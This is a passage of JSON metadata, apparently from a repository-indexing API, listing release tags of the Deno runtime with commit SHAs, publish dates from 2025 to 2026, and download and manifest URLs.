":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno